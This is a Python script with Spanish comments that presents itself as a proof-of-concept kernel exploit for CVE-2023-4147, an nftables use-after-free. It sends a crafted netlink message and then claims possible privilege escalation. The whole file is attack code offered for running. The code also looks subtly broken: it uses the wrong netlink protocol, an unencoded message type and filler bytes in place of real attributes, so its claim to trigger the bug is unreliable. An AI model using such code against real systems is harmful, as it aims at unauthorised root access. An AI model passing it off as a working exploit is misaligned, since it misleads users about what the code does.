import os
import ctypes
import struct

# Constantes necesarias
NETLINK_GENERIC = 16
NLM_F_REQUEST = 0x01
NLM_F_ACK = 0x04
NLM_F_CREATE = 0x400
NLM_F_EXCL = 0x200
NLMSG_NOOP = 1
NLMSG_ERROR = 2
NLMSG_DONE = 3
NLMSG_OVERRUN = 4
NFNL_SUBSYS_NFTABLES = 10
NFNL_MSG_NEWCHAIN = 0

# Funciones del sistema
libc = ctypes.CDLL('libc.so.6', use_errno=True)

def create_netlink_socket():
    """Crea un socket Netlink."""
    sock_fd = libc.socket(16, 3, NETLINK_GENERIC)
    if sock_fd < 0:
        raise RuntimeError("No se pudo crear el socket Netlink")
    return sock_fd

def send_netlink_message(sock_fd, payload):
    """Envía un mensaje Netlink especialmente diseñado."""
    nlmsg_len = len(payload) + 16  # Header Netlink
    nlmsg_type = NFNL_MSG_NEWCHAIN
    nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL
    nlmsg_seq = 1
    nlmsg_pid = os.getpid()

    nlmsg_header = struct.pack("IHHII", nlmsg_len, nlmsg_type, nlmsg_flags, nlmsg_seq, nlmsg_pid)
    message = nlmsg_header + payload

    libc.send(sock_fd, message, len(message), 0)

def trigger_vulnerability():
    """Ejecuta el exploit enviando un mensaje malicioso."""
    print("[*] Creando socket Netlink...")
    sock_fd = create_netlink_socket()

    print("[*] Construyendo carga maliciosa...")
    # Crear carga útil que manipule NFTA_RULE_CHAIN_ID
    payload = b"A" * 128  # Ajustar el tamaño según se requiera para provocar UAF
    payload += struct.pack("I", 0xdeadbeef)  # Datos maliciosos

    print("[*] Enviando mensaje Netlink...")
    send_netlink_message(sock_fd, payload)

    print("[+] Posible explotación completada. Verifique privilegios o comportamiento del sistema.")

if __name__ == "__main__":
    print("[*] Iniciando exploit PoC para CVE-2023-4147...")
    try:
        trigger_vulnerability()
    except Exception as e:
        print(f"[!] Error al ejecutar el exploit: {e}")
